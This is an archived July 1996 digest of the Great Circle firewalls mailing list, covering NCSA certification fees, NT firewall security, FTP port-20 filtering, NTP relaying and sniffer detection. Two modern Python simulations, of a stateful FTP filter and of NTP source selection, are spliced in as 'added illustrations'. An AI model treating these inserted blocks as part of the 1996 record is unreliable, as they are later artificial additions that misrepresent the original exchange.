From firewalls-owner Mon Jul 1 01:33:56 1996
From: michaelf@amitech.dk
Message-Id: <199607010815.AA14073@ic1.ic.dk>
Date: Mon, 1 Jul 1996 10:18:05 +0200
To: firewalls@GreatCircle.COM
Subject: RE: NT Backoffice "Catapult" firewall ce

The "list" Bill Stout put together, where can I get it?

Btw. It is very impressive that you have been securing NT systems for 5 years! I mean, v3.1 was released in 1993. (don't flame, I think it is OK to overdo something when it serves a purpose! "michael@memra.com" certainly has a bit in his head permanently turned against NT ?!??)

Michael Frandsen
michaelf@amitech.dk

----------
From: Russ.Cooper@RC.Toronto.on.ca
Sent: 01. July 1996 03:21
To: "'johnb@aztec.co.za'"

Date: Mon, 1 Jul 1996 07:32:42 -0400 (EDT)
Message-Id: <199607011132.HAA26749@dns.ottawa.net>
To: CMH@Interramp.com
From: bjm@ottawa.net (Brian McIntosh)
Subject: Re: NCSA Certification
Cc: firewalls@GreatCircle.COM

>> >> Incorrect. Only those vendors who were members knew. First, you had to join.
>

Any firewall vendor who doesn't know what's going on with NCSA (and in particular with their firewall vendors working group) is not a vendor that I would want to buy a firewall from. If a vendor chooses to conduct business as though they were living alone on an isolated island then they shouldn't complain when the rest of the world throws a party and they aren't invited.

Regards,
Brian

========================================================
Brian J. McIntosh                    UniSol Inc.
53 Courtney Road                     Tel: 613 831 6373
Kanata, Ontario                      Fax: 613 831 4739
Canada, K2L 1M1                      Email: bjm@ottawa.net
========================================================

From firewalls-owner Mon Jul 1 05:04:22 1996
Date: Mon, 1 Jul 1996 12:37:56 +0100 (BST)
From: Dave Roberts
To: Alex Filacchione
Cc: Darwin Martinez
Subject: RE: ftp problem
In-Reply-To: <01BB61C3.CCAFA240@alexf.iss.net>

On Mon, 24 Jun 1996, Alex Filacchione wrote:

>> You would need to allow incoming connection from the outside port 20, to
>> the inside port >1023 (probably excluding the X11 ports).
>
> If you do this, then will you not be opening up potential source porting
> problems? Incoming TCP connections from port 20 on an attacking machine
> would make it through, no? Isn't the purpose behind PASV ftp specifically
> to stop this potential problem? Something to think about.

Sure, and hence the usual argument ensues about PASV or not PASV. :-)

If you use PASV, then the server has to open up a wide number of ports. If you use normal mode, then you do. Someone takes the risk.

Someone mentioned that FW-1 uses a stateful filter, which could be the answer. If the filter recognises an outgoing FTP connection, then perhaps it then allows incoming connections from that IP's port 20.

A little more helpful - perhaps.

Dave Roberts        | "Surfing the Internet" is a sad term for sad people.
Unix Systems Admin  | Get a board, find a beach, surf some REAL waves and
SAA Consultants Ltd | get a *real* life.
Plymouth, U.K.      | -=[For PGP Key, send mail with subject of "get pgp"]=-

From firewalls-owner Mon Jul 1 05:34:22 1996
Message-Id: <31D7C2D2.25E@apogee-com.fr>
Date: Mon, 01 Jul 1996 14:21:38 +0200
From: Jean-Francois Zwobada
Organization: APOGEE Communications
To: firewalls@greatcircle.com
Subject: Config NTP
References: <199606280840.KAA08501@mailimailo.univ-rennes1.fr>

Hi,

I need to configure a firewall as an NTP relay... I will use 2 or 3 French public servers (Is this enough to avoid any time spoof?) and relay it to internal servers.

I built a first configuration scheme, and I am interested in any comment on such a config:

--------------------------------------
driftfile /usr/local/ntp/ntp.drift
statsdir /usr/local/ntp/stats/
disable pll            # firewall won't be affected
enable monitor
enable stats
restrict default notrust nomodify
peer external_ntp_server_1
restrict external_ntp_server_1
peer ...
restrict ...
broadcast my_subnet
---------------------------------------

I won't use any authentication on the site, since I trust my firewall (Well...
:^) and all the servers will be managed by the same team.

Any advice would be welcomed!

Jean-Francois
--
______________________ Jean-Francois Zwobada ____________________
Apogee Communications          Tel : +33 (1) 69 85 56 47
Parc Club Universite           Fax : +33 (1) 69 85 56 48
28, rue Jean Rostand
91893 ORSAY Cedex              e-mail : zwobada@apogee-com.fr
__________________________________________________________________

From firewalls-owner Mon Jul 1 05:49:06 1996
Message-Id: <199607011237.FAA11910@miles.greatcircle.com>
Date: Mon, 1 Jul 1996 08:34:50 -0400
From: gary flynn
To: firewalls@GreatCircle.COM
Subject: Re: NCSA Certification

> I think some important questions need to be asked:
>
> 1. Who appointed the NCSA as the proper body to approve firewalls?
>

I think your questions are valid but I think the underlying principle is "lead, follow, or get the hell out of the way" :-)

From firewalls-owner Mon Jul 1 06:19:07 1996
From: Rick Romkey
Message-Id: <199607011300.JAA26894@maddie.atlantic.com>
Subject: Re: Hardware requirements of Firewall-1
To: baysalc@boun.edu.tr (Can BAYSAL)
Date: Mon, 1 Jul 1996 09:00:51 -0400 (EDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "Can BAYSAL" at Jun 30, 96 03:08:07 pm

>
> Hi there;
> I wonder what is the REAL minimum required configuration of
> Firewall-1. The book says that Sun SPARC based system, I do not think
> this means IPX :) , does it? For example on a 10 Mbits ethernet would a
> Sparc 5 be acceptable?

Firewall-1 can even run on Intel hardware. In its 2.0 release, you can install it on Solaris for Intel... it works great. Of course, in its 2.1 release you can run under NT, so Intel is definitely an option.
-Rick
----------------------------------------------------------------------------
Rick E Romkey          | A T L A N T I C                  | Internet
pokey@atlantic.com     | Computing Technology Corporation | Specialists
(860) 667-9596         | http://www.atlantic.com/         |
-----------------------------------------------------------------------------

From firewalls-owner Mon Jul 1 06:49:40 1996
From: peter@baileynm.com (Peter da Silva)
Message-Id: <9607011337.AA04872@sonic.nmti.com.nmti.com>
Subject: Re: Stateful Packet Screens
To: shaver@neon.ingenia.ca (Mike Shaver)
Date: Mon, 1 Jul 1996 08:37:28 -0500 (CDT)
Cc: avalon@coombs.anu.edu.au, chris@dejong.com, Firewalls@GreatCircle.COM
In-Reply-To: <199606302141.RAA31883@neon.ingenia.com> from "Mike Shaver" at Jun 30, 96 05:41:40 pm

> As Darren pointed out, it's possible to do everything an AG does with
> an SPS, and vice versa.

However, in practical terms, you can't get a stateful packet filter that will do all the stuff even the simplest application level gateways do as a matter of course, and for a simple configuration it's much easier to get the existing ALGs configured right than the existing SPFs.

In theory, you and Darren are correct. In practice, existing implementations do fall into clumps with user convenience and performance being highest for packet filters, and administrative convenience and security being highest for proxies.

From firewalls-owner Mon Jul 1 07:04:08 1996
From: peter@baileynm.com (Peter da Silva)
Message-Id: <9607011342.AA05303@sonic.nmti.com.nmti.com>
Subject: Re: NT Backoffice "Catapult" firewall certified?
To: michael@memra.com (Michael Dillon)
Date: Mon, 1 Jul 1996 08:42:51 -0500 (CDT)
Cc: firewalls@GreatCircle.COM
In-Reply-To: from "Michael Dillon" at Jun 30, 96 03:25:07 pm

> Looking for a specific mailing list? http://www.liszt.com has the largest
> list of mailing lists available on the Internet.

You have to be careful.
They don't do much checking and a hell of a lot of the lists they come up with are defunct, private, or inaccurately described. I don't think it would be practical for them to even try, given the number of lists... just keep that in mind.

> With around 48,000 lists
> in their database it appears that there are 3 times as many mailing lists
> as USENET discussion groups.

I would imagine so, since I have three or four mailing lists they don't include (small, special purpose lists... they *won't* include them if I have anything to do with it).

From firewalls-owner Mon Jul 1 07:18:57 1996
Message-Id: <199607011404.HAA19631@miles.greatcircle.com>
From: Darren Reed
Subject: Re: Stateful Packet Screens
To: peter@baileynm.com (Peter da Silva)
Date: Mon, 1 Jul 1996 23:58:17 +1000 (EST)
Cc: shaver@neon.ingenia.ca, Firewalls@GreatCircle.COM (Firewalls Mailing List)
In-Reply-To: <9607011337.AA04872@sonic.nmti.com.nmti.com> from "Peter da Silva" at Jul 1, 96 08:37:28 am

In some mail from Peter da Silva, sie said:
>
> > As Darren pointed out, it's possible to do everything an AG does with
> > an SPS, and vice versa.
>
> However, in practical terms, you can't get a stateful packet filter that
> will do all the stuff even the simplest application level gateways do as
> a matter of course, and for a simple configuration it's much easier to
> get the existing ALGs configured right than the existing SPFs.

The simplest application gateways just forward data, in sequence. I class things like "tcp-relay", etc, as AG's. Even plug-gw isn't that complicated, compared to, say, ftp-gw.

> In theory, you and Darren are correct. In practice, existing implementations
> do fall into clumps with user convenience and performance being highest for
> packet filters, and administrative convenience and security being highest
> for proxies.

Time permitting, I'll make you eat those words.

From firewalls-owner Mon Jul 1 07:50:17 1996
Date: Mon, 1 Jul 1996 10:34:58 -0400
To: gary flynn , firewalls@GreatCircle.COM
From: CMH@Interramp.com (Corey M. Horowitz)
Subject: Re: NCSA Certification
Cc: firewalls@greatcircle.com

At 08:34 AM 7/1/96, gary flynn wrote:
>> I think some important questions need to be asked:
>>
>> 1. Who appointed the NCSA as the proper body to approve firewalls?
>>
>
>I think your questions are valid but I think the underlying
>principle is "lead, follow, or get the hell out of the way" :-)

I think you're all missing the point. I have no problem with the concept of the NCSA or any other responsible body acting as a protector of the public interest in insuring that all firewall products deliver the security promised or, at a minimum, necessary to adequately protect our networks. The mission statement is admirable. The execution is faulty.

According to Mr.
Tippett, President of NCSA, "the NCSA tries to act in this regard like a government agency for the commercial sector." (Communications Week. June 17). What government agency requires membership for a fee prior to testing a vendor's product? Moreover, isn't the NCSA's list just an advertisement unless all firewall vendors are invited to have their product tested irrespective of membership in the NCSA? Does the list state that it is an ad for the NCSA and its members?

Mr Tippett adds "you shouldn't buy a firewall that hasn't been tested and certified, just like you shouldn't buy a lamp that does not have a UL stamp on it." (Communications Week, June 17). I don't believe the UL is a for-profit organization nor is any vendor's product not acceptable for testing.

The issue here is disclosure and proper execution of a responsible mission.

------------
Corey M. Horowitz
CMH Capital Management Corp.
909 Third Avenue 9th Floor
New York, N.Y. 10022
CMH@Interramp.com
212-293-3082 (voice)
212-293-3090 (fax)

From firewalls-owner Mon Jul 1 08:04:06 1996
From: John Betts
Message-Id: <199607011443.QAA30859@rbit.co.za>
Subject: Re: NT Backoffice "Catapult" firewall certified?
To: dleblanc@iss.net (David LeBlanc)
Date: Mon, 1 Jul 1996 16:43:31 +0200 (SAT)
Cc: firewalls@greatcircle.com
In-Reply-To: <2.2.32.19960701134725.009546f4@mail.iss.net> from "David LeBlanc" at Jul 1, 96 09:47:25 am
Reply-to: johnb@aztec.co.za

% This isn't true. Guest doesn't have permissions to write the registry.
% Besides which, the first thing you do when setting up an NT machine is to
% disable guest. Somewhat like taking the + out of the rhosts file on a Sun.
%

In my haste to clear my mailbox, I didn't give 100% truths. I didn't mean to imply that Guest could do _anything_ to the registry, just some things (remotely).

Not every person who puts NT boxes (or any other unix box for that matter) on the Internet knows about things like disabling guest account, setting permissions on shares correctly, etc. I am fairly sure that _MY_ nt box is fairly secure, but that's only because I spent time going through anything that I could think of to secure it.

My main point against NT firewalls is the following: _as a general rule_ people who want NT firewalls, want them because any tom, dick and harry can get them going, without extensive knowledge of security and tcp/ip. I have no problem with firewalls that are so easy to administer, etc, BUT, generally, the people who set up these easy-to-use firewalls, don't know/think about things like disabling guest account (I know, lame example), or setting permissions on shares (or disabling all shares, or whatever), etc, and if the firewall software doesn't do this for them, then their firewall host can be easily compromised....

It takes time and knowledge (well, more like common sense) to make an NT box secure(ish). We all know that a large majority of ppl who insist on NT because of its ease of use, and requirement for little to no knowledge of system administration and security, don't have the time and knowledge to secure their box.

I hope that I did not offend or mislead anyone here. if so, I'm sorry, and you are welcome to flame my procmail^H^H^H^H^H^H^H^Hme ;-)

ciao
-- John
--
John Betts, Aztec Internet Services
Port Elizabeth, South Africa
johnb@aztec.co.za, Tel. +27(0)41 303 475, Fax. +27(0)41 301 052
The world is complex. The Sendmail configuration reflects this.
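The "ftp problem" exchange between Alex Filacchione and Dave Roberts earlier in this digest contrasts a static "outside port 20 to inside >1023" rule with a stateful filter that opens the data port only after seeing the outbound control session. The following is an added illustration, not code from the thread or from any firewall product; the addresses, the PORT line and the probe packets are constructed.

```python
"""Static "source port 20" rule versus a stateful FTP pinhole.

Added example, not from the thread or any firewall product. Simulates, on
constructed packets, the two approaches discussed for active-mode FTP data
connections: a static rule admitting any external TCP connection from
source port 20 to an internal port above 1023, and a stateful filter that
opens a pinhole only for the data connection announced on an outbound
control channel via the PORT command.
"""
from dataclasses import dataclass
from typing import Dict, Set, Tuple

INTERNAL_NET = "10.0.0."        # constructed internal prefix
X11_PORTS = range(6000, 6064)   # the "probably excluding the X11 ports" clause


@dataclass(frozen=True)
class Syn:
    """A TCP connection attempt (SYN), reduced to the fields a filter keys on."""
    src: str
    sport: int
    dst: str
    dport: int


def is_internal(ip: str) -> bool:
    return ip.startswith(INTERNAL_NET)


def static_rule_allows(pkt: Syn) -> bool:
    """The rule quoted in the thread: outside port 20 -> inside port >1023, minus X11.
    The source port is chosen by the remote side, so any host can satisfy it."""
    return (not is_internal(pkt.src) and is_internal(pkt.dst)
            and pkt.sport == 20 and pkt.dport > 1023
            and pkt.dport not in X11_PORTS)


class StatefulFtpFilter:
    """Tracks outbound FTP control sessions and admits only the data
    connection each one announced (server:20 -> client:port from PORT)."""

    def __init__(self) -> None:
        self.control: Set[Tuple[str, str]] = set()  # (client, server) pairs
        self.pinholes: Set[Syn] = set()             # expected inbound data SYNs

    def outbound_control(self, client: str, server: str) -> None:
        """Record an internal client connecting out to server:21."""
        if is_internal(client) and not is_internal(server):
            self.control.add((client, server))

    def observe_port_command(self, client: str, server: str, line: str) -> None:
        """Parse 'PORT h1,h2,h3,h4,p1,p2' sent by the client on its control session."""
        if (client, server) not in self.control or not line.startswith("PORT "):
            return
        fields = line[5:].strip().split(",")
        if len(fields) != 6 or not all(f.isdigit() for f in fields):
            return
        host = ".".join(fields[:4])
        port = int(fields[4]) * 256 + int(fields[5])
        # Only honour a PORT that names the client itself; a PORT pointing at
        # another host would turn the pinhole into access to a third party.
        if host != client or port <= 1023:
            return
        self.pinholes.add(Syn(src=server, sport=20, dst=client, dport=port))

    def inbound_allows(self, pkt: Syn) -> bool:
        """Admit an inbound SYN only if it matches an announced data connection.
        (A real filter also expires pinholes and closes them with the session.)"""
        return pkt in self.pinholes


CLIENT, SERVER, ROGUE = "10.0.0.5", "203.0.113.7", "198.51.100.9"  # constructed


def run_scenario() -> Dict[str, Tuple[bool, bool]]:
    """Return {probe: (static_rule_allows, stateful_allows)} for constructed SYNs."""
    fw = StatefulFtpFilter()
    fw.outbound_control(CLIENT, SERVER)
    fw.observe_port_command(CLIENT, SERVER, "PORT 10,0,0,5,4,1")  # 4*256+1 = 1025
    probes = {
        "data connection from the real server": Syn(SERVER, 20, CLIENT, 1025),
        "rogue host using source port 20":      Syn(ROGUE, 20, CLIENT, 1025),
        "rogue host, another high port":        Syn(ROGUE, 20, CLIENT, 2049),
        "real server, port not announced":      Syn(SERVER, 20, CLIENT, 1026),
        "rogue host to X11 port 6000":          Syn(ROGUE, 20, CLIENT, 6000),
    }
    return {name: (static_rule_allows(p), fw.inbound_allows(p))
            for name, p in probes.items()}


if __name__ == "__main__":
    for name, (static_ok, stateful_ok) in run_scenario().items():
        print(f"{name:40} static={'ALLOW' if static_ok else 'deny':5} "
              f"stateful={'ALLOW' if stateful_ok else 'deny'}")
```

Only the announced server:20 to client:1025 connection passes the stateful check, while the static rule also admits the rogue host's probes to every other high port.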
From firewalls-owner Mon Jul 1 08:34:10 1996
From: dnewman@mcgraw-hill.com
Message-Id: <199607011517.AA14150@interlock.mgh.com>
Date: Mon, 01 Jul 96 09:09:19 edt
Subject: NT security--Bill Stout's list

Russ Cooper writes:

>> "Because NT has even more security holes than Irix *duck*, I won't list
>> them here,"

>It's interesting that you should say this. Bill Stout put a very good list
>together, but a number of those issues can be addressed. . .

Russ, can you please post a URL for this list? TIA.

Regards
David Newman

From firewalls-owner Mon Jul 1 08:49:01 1996
Date: Mon, 1 Jul 1996 10:35:50 -0500 (CDT)
From: Robert Bonomi
Message-Id: <199607011535.KAA04130@delta.eecs.nwu.edu>
To: firewalls@GreatCircle.COM
Subject: Re: NCSA Certification

+ From: CMH@Interramp.com (Corey M. Horowitz)
+ Subject: Re: NCSA Certification
+ Cc: firewalls@GreatCircle.COM
+ Sender: firewalls-owner@GreatCircle.COM
+
[snip]
+ Mr Tippett adds "you shouldn't buy a firewall that hasn't been tested
+ and certified, just like you shouldn't buy a lamp that does not have a UL
+ stamp on it." (Communications Week, June 17). I don't believe the UL is a
+ for-profit organization nor is any vendor's product not acceptable for
+ testing.

I'll admit ignorance about UL's for-profit status, and I'll agree that they -will- test anything for anybody. I would point out that they -CHARGE- for doing that testing, however.

I'll suggest that there's no problem with NCSA charging a fee for the evaluation, *even*if* there are different fee schedules for members/non-members.
Does anybody _know_ if NCSA -would- test a non-member implementation?

From firewalls-owner Mon Jul 1 09:24:19 1996
Date: Mon, 01 Jul 1996 11:14:35 -0500
From: "Samuel T. Baker"
To: firewalls@GreatCircle.COM
Cc: CMH@Interramp.com
Subject: Re: NCSA Certification -Reply

>>> Corey M. Horowitz 09:34 1 Jul 1996 >>>
[snip]
> What government agency requires membership for a fee prior
> to testing a vendor's product?
[snip]

Government requires payment of taxes to be a member of the nation and enjoy its services.

[snip]
> I don't believe the UL is a for-profit organization nor is any vendor's product not
> acceptable for testing.
[snip]

How is the UL funded? How could a funding source be developed for NCSA? (No free lunch.) I expect NCSA would be willing to consider positive suggestions about its role and funding that would enhance its services.

Samuel T. Baker
. . . standard disclaimer . . .
Happy Birthday, Tennessee
Celebration of the Centuries, 1796-1996

From firewalls-owner Mon Jul 1 09:56:54 1996
Message-ID: <01BB674A.AC194A40@dcc02469.slip.digex.net>
From: "Russell L. Jones"
To: "'firewalls@GreatCircle.COM'"
Subject: General Questions
Date: Mon, 1 Jul 1996 12:41:45 -0400

Where are the archives for this discussion group located?

Thanks in advance.
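Jean-Francois Zwobada's "Config NTP" post earlier in this digest asks whether two or three public servers are enough to avoid a spoofed time. NTP's selection ("intersection") step treats each source as a correctness interval and keeps only the sources that agree with a strict majority, so the answer follows from counting. The block below is an added illustration of a simplified form of that step, not code from the thread or from the ntp/xntp distribution; the server names, offsets and error bounds are constructed.

```python
"""Simplified NTP clock selection: why two upstream servers are not enough.

Added example, not from the thread or the NTP reference implementation.
Each source reports an offset (its clock minus ours) and an error bound
(root distance), giving a correctness interval [offset - bound,
offset + bound]. The selection step keeps the largest set of sources
whose intervals share a point, and only if that set is a strict majority.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Source:
    name: str
    offset: float   # measured offset of the source's clock from ours, seconds
    bound: float    # its error bound (root distance), seconds

    @property
    def interval(self) -> Tuple[float, float]:
        return (self.offset - self.bound, self.offset + self.bound)


def select_truechimers(sources: List[Source]) -> Optional[List[Source]]:
    """Return the majority of mutually consistent sources, or None if no
    strict majority agrees. Note that a single source is a majority of one."""
    best: List[Source] = []
    # Any maximal overlap region is bounded by some interval endpoint, so
    # checking every endpoint finds the point covered by the most sources.
    for s in sources:
        for point in s.interval:
            covered = [c for c in sources if c.interval[0] <= point <= c.interval[1]]
            if len(covered) > len(best):
                best = covered
    return best if 2 * len(best) > len(sources) else None


def combined_offset(sources: List[Source]) -> Optional[float]:
    """Offset the client would apply: the mean of the survivors' offsets.
    (The real algorithm weights survivors by quality; the survivor set is the point.)"""
    survivors = select_truechimers(sources)
    if not survivors:
        return None
    return sum(s.offset for s in survivors) / len(survivors)


# Constructed measurements: two healthy public servers and one whose replies
# are forged or whose clock is broken, claiming we are ten minutes slow.
HEALTHY_A = Source("ntp-a", offset=0.012, bound=0.020)
HEALTHY_B = Source("ntp-b", offset=-0.004, bound=0.025)
BAD_C = Source("ntp-c", offset=600.0, bound=0.030)


def demo() -> Dict[str, List[str]]:
    """Survivor names for the three configurations worth comparing."""
    cases = {
        "three servers, one bad": [HEALTHY_A, HEALTHY_B, BAD_C],
        "two servers, one bad": [HEALTHY_A, BAD_C],
        "one server, bad": [BAD_C],
    }
    return {label: [s.name for s in (select_truechimers(srcs) or [])]
            for label, srcs in cases.items()}


if __name__ == "__main__":
    for label, names in demo().items():
        print(f"{label:24} survivors={names or 'none (cannot choose)'}")
```

With three sources the outlier is voted out; with two that disagree nothing can be chosen, and a lone source is trusted as-is, which is the case an unauthenticated relay is most exposed to.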
From firewalls-owner Mon Jul 1 10:08:16 1996
From: ralph@omni.mpsisys.com (Ralph Mitchell)
Message-Id: <9607011654.AA15034@omni.mpsisys.com>
Subject: Re: NCSA Certification
To: firewalls@GreatCircle.COM
Date: Mon, 1 Jul 1996 11:54:46 -0500 (CDT)
In-Reply-To: from "Corey M. Horowitz" at Jun 30, 96 12:38:03 pm

> >Every vendor still knew what it was about and could have joined. Let's
> >say you and your friends are told you can make an investment, but can
> >only find out how to make the investment pay off until you do invest.
> >And you decide not to do it, but everyone else does. Do you now cry
> >'unfair, unfair' if it pays off for them?!? I would think not.
> >
> Certainly not. However, the NCSA is now holding itself out as the
> firewall approval body. Fine, don't they have an obligation to the public
> to review all firewalls, not just their paying members? The way they do
> it is paying off to them to the detriment of others and misleading the
> public. Without full disclosure, their list is misleading.

I don't know much about NCSA, but unless *all* their equipment is donated and *all* their staff are volunteers, someone has to foot the bill... OK, so maybe instead of insisting on vendors paying a membership fee they could charge non-members a reasonable hourly or daily rate for the testing. But then, who decides what's 'reasonable'? :) Would say, $100 per hour, or $1000 per day be considered 'reasonable'? Wouldn't take too many days to add up to $22,000... :) And then, I guess, we'd have people bitching about "It cost me twice as much to have my whizz-bang XYZ firewall tested, compared to the FireBall from Great Walls of Fire Corp..."

Before anyone wastes bandwidth stating the obvious, I realize that a more complex firewall would take more time (and money...) to fully test... My point is that it's gonna cost someone, somewhere, a pile of money to put together the equipment and expertise to properly test each firewall, and it's not at all unreasonable to expect the vendor to pay, whether it be a flat-rate membership fee, or a per-hour/per-firewall fee.

Just my $0.02...
Ralph Mitchell (System Administrator)
--
MPSI Inc., 8282 South Memorial Drive, Tulsa, Oklahoma 74133
Email: ralph@mpsisys.com   PHONE: 918-250-9611 x237   FAX: 918-254-8764
"Never underestimate the power of human stupidity" - Salvor Hardin, Foundation

From firewalls-owner Mon Jul 1 10:29:19 1996
Message-ID: <01BB674A.2AC7D240@dcc02469.slip.digex.net>
From: "Russell L. Jones"
To: "'firewalls@GreatCircle.COM'"
Subject: Cisco Router security
Date: Mon, 1 Jul 1996 12:38:03 -0400

What are the known bugs which leave Cisco routers running the 10.X version of the management software vulnerable to IP based attacks?

Russell L. Jones

From firewalls-owner Mon Jul 1 10:38:02 1996
Date: Mon, 1 Jul 1996 10:13:26 -0700
From: dmurphy@cwa.com (Dan Murphy x286)
Message-Id: <199607011713.KAA12285@hilo.cwa.com>
To: firewalls@GreatCircle.COM
Subject: Re: NCSA Certification
Cc: CMH@Interramp.com, gary@habanero.jmu.ed

At the risk of prolonging this discussion further, I'd like to point out that if this quote is accurate (from one of CMH's posts, I think):

+ According to Mr. Tippett, President of NCSA, "the NCSA tries to act in this
+ regard like a government agency for the commercial sector." (Communications
+ Week. June 17).

then NCSA, if it is a 501-C tax-exempt US trade association, may be in a world of trouble with respect to US anti-trust laws.

Gary Flynn and his company might get a better ROI if, instead of joining NCSA and whining in this forum about their certification program, they spent the same kind of time, energy and money talking to one of the many DC law firms that does a lot of competitive restraint-of-trade work. With treble damages and criminal penalties at risk, behaviors can be influenced much more quickly than with a PR campaign.
+-------------------------------------------------------------------+
| Dan Murphy, CWA Communication Products  | email: dmurphy@cwa.com  |
| 401 Alberto Way, Los Gatos, CA 95032    | voice: 408-358-1529     |
| (Nihon-go wa mada jouzo ja arimasen.)   | faxen: 408-356-7061     |
+-------------------------------------------------------------------+

From firewalls-owner Mon Jul 1 10:45:33 1996
From: Russ
To: David LeBlanc
Cc: "firewalls@greatcircle.com"
Subject: RE: NT Backoffice "Catapult" firewall certified?
Date: Mon, 1 Jul 1996 12:42:28 -0400

I promise not to drag this thread out any longer than it absolutely has to, but a couple of generalizations by John Betts need to be addressed.

"Not every person who puts NT boxes (or any other unix box for that matter) on the Internet knows about things like disabling guest account, setting permissions on shares correctly, etc."

This is unfortunately true, but I fail to see its relevance in this discussion. Basically, you are saying that people don't know/aren't interested in properly securing their boxes (any OS) despite putting them in risky environments, which is one of the reasons this list exists, so we all knew that one already. The basics, like disabling guest privileges, setting permissions on shares correctly, etc. are just that, basics.

"My main point against NT firewalls is the following: _as a general rule_ people who want NT firewalls, want them because any tom, dick and harry can get them going, without extensive knowledge of security and tcp/ip."

Funny, but isn't it true to say that anyone who goes out and buys any firewall is doing so because they don't want (don't have the time) to have to learn everything that the firewall vendor learned about security and tcp/ip? Isn't the whole idea behind a purchased firewall that it should make it easier to get them going rather than programming it all yourself? A Borderware firewall gets plugged in, installed (which any tom, dick, or harry could do), and is up and running, with all ports closed. A couple of menu selections later and your site has HTTP, SMTP, FTP, NNTP access to the Internet, securely. Any idiot could set up a Borderware firewall, with no real understanding of either security or tcp/ip (no more than any other machine where you have to configure a network stack). Same holds true for many of the commercial Firewalls available today. This is not an NT-thing!!!

Personally, I believe that people who want to buy an NT-based Firewall are simply trying to provide a consistent interface to their client environment. Probably the single most important reason I can think of is integration with an existing user database, thereby avoiding having to have multiple databases to administer. The old "single sign-on" thing. Truth be told, getting an NT-based Firewall does not translate to "single sign-on", there are far better methods (like ACE) to achieve that goal. However, if your environment doesn't include Unix boxes or large servers (a.k.a. mainframes), an NT-based Firewall may make administration considerably easier.

"I have no problem with firewalls that are so easy to administer, etc, BUT, generally, the people who set up these easy-to-use firewalls, don't know/think about things like disabling guest account (I know, lame example), or setting permissions on shares (or disabling all shares, or whatever), etc, and if the firewall software doesn't do this for them, then their firewall host can be easily compromised...."

I don't know of any NT-based Firewall product available today that does not do the things you are talking about during its installation, and I've looked at more than most. The statement would imply that you have seen an NT-based Firewall that doesn't do this, and if so, which one, I want to know? What you are implying is that the designers of *some* NT Firewall products do not know about these basic security steps. I have not seen an NT Firewall which can be installed *insecurely*.

Products like WinGate, or Catapult, are not Firewalls, but proxy servers, and while their security is no less important than that of a firewall, they are both designed to run with other applications on an NT-box (WinGate wasn't specifically designed for NT, but will run on NT). As such, neither impose a security model on the installer and instead leave it up to the installer to decide what to do to secure the box properly. Both can be installed *insecurely*, such that the box can be compromised.

"It takes time and knowledge (well, more like common sense) to make an NT box secure(ish). We all know that a large majority of ppl who insist on NT because of its ease of use, and requirement for little-to no knowledge of system administration and security, don't have the time and knowledge to secure their box."

Again, this generalization applies to all computers, period. I personally don't think that there is a large majority of people who are insisting on NT because of its ease of use, and requirement for little-to no knowledge of system administration and security. If that was true, it wouldn't be so difficult to find people who are good at NT. NT's administrative model is no less complex than Novell's, or Banyan's, and in some cases it can be far more complex (due to the lack of Directory Services). By default, both NT and Novell are very wide open after an initial installation, so NT doesn't simplify the security either.

I would counter your generalization with one of my own. A large majority of people who are administering NT do have the ability to properly secure a large majority of the security requirements of an NT environment. It's sad, but true, that many companies do not give their administrative IS staff enough time to properly configure that security or properly construct a viable security policy, irregardless of the OS involved.

"I hope that I did not offend or mislead anyone here."

Offend, definitely not. Mislead, you continue to do so...;-]

"if so, I'm sorry, and you are welcome to flame my procmail^H^H^H^H^H^H^H^Hme ;-)"

Well, here goes...;-]

Cheers,
Russ

From firewalls-owner Mon Jul 1 11:10:40 1996
From: "Urban A. Haas"
Reply-To: uhaas@tsg-usa.com
Organization: Total Solutions Group
To: Firewall Mailing List at Great Circle
Subject: Re: Network ethernet sniffer
Date: Mon, 01 Jul 1996 12:13:34 -0500

Ben wrote:
> > is it possible to detect if a machine and then which machine might be
> > sniffing the network if the machines are about 60 - 70 on that subnet.
> > It would be good to know if it is possible and then how if someone knows.

You can usually do this on Token-ring, but not Ethernet. It just isn't designed in there.

> You can use programs to detect if there are any ethernet adaptors in
> promiscuous mode.

This also isn't a good test, but it's a start. Some *IX machines go into promiscuous mode to automatically build arp caches, do dpli (for IPX or NetBIOS) and other things.

--
Urban A. Haas                     | Total Solutions Group
Open Systems & Network Consultant | (612) 831-8320 x133
Internet: uhaas@tsg-usa.com       | mailto:uhaas@tsg-usa.com -or-
                                  | mailto:uhaas@aol.com

From firewalls-owner Mon Jul 1 11:28:50 1996
From: Chris Kostick
To: "firewalls@GreatCircle.COM"
Subject: RE: NCSA Certification
Date: Mon, 1 Jul 1996 14:09:27 -0400
Dan Murphy x286 [SMTP:dmurphy@cwa.com] wrote:
> At the risk of prolonging this discussion further, I'd like to point out
> that if this quote is accurate (from one of CMH's posts, I think):
>
> + According to Mr. Tippett, President of NCSA, "the NCSA tries to act in this
> + regard like a government agency for the commercial sector." (Communications
> + Week. June 17).
>
> then NCSA, if it is a 501-C tax-exempt US trade association, may be in a
> world of trouble with respect to US anti-trust laws. Gary Flynn and his
> company might get a better ROI if, instead of joining NCSA and whining in
> this forum about their certification program, they spent the same kind of
> time, energy and money talking to one of the many DC law firms that does
> a lot of competitive restraint-of-trade work. With treble damages and
> criminal penalties at risk, behaviors can be influenced much more quickly
> than with a PR campaign.

And with this posting, we have officially gone off the deep end.

-- Chris

From firewalls-owner Mon Jul 1 11:34:06 1996
From: bjm@ottawa.net (Brian McIntosh)
To: CMH@Interramp.com
Cc: firewalls@GreatCircle.COM
Subject: Re: NCSA Certification
Date: Mon, 1 Jul 1996 13:57:42 -0400 (EDT)

> I think you're all missing the point.

Corey, perhaps you're the one who's missing the point rather than all of us. NCSA is a private organization and they can establish firewall criteria if they feel like it. Adherence by vendors as well as acceptance by users is purely voluntary. There are no laws or statutes that say a vendor must test / comply, nor are users forced to only buy an NCSA-certified firewall. If a vendor chooses to participate and a user willingly accepts the certification process as having merit, then so be it - this is the basis of the free market system. Similarly, you have every right to not participate in, or accept, the process but you shouldn't expect the whole netsec community to necessarily agree with your position. This too, is a matter of free choice.

> I don't believe the UL is a for-profit organization nor is any vendor's product
> not acceptable for testing.

U.L. is a private organization founded in 1894 by William H. Merrill. Vendors pay U.L. for evaluating their products and this is the organization's principal source of revenue. If a vendor is willing to pay the fee, U.L. will test.

========================================================
Brian J. McIntosh            UniSol Inc.
53 Courtney Road             Tel: 613 831 6373
Kanata, Ontario              Fax: 613 831 4739
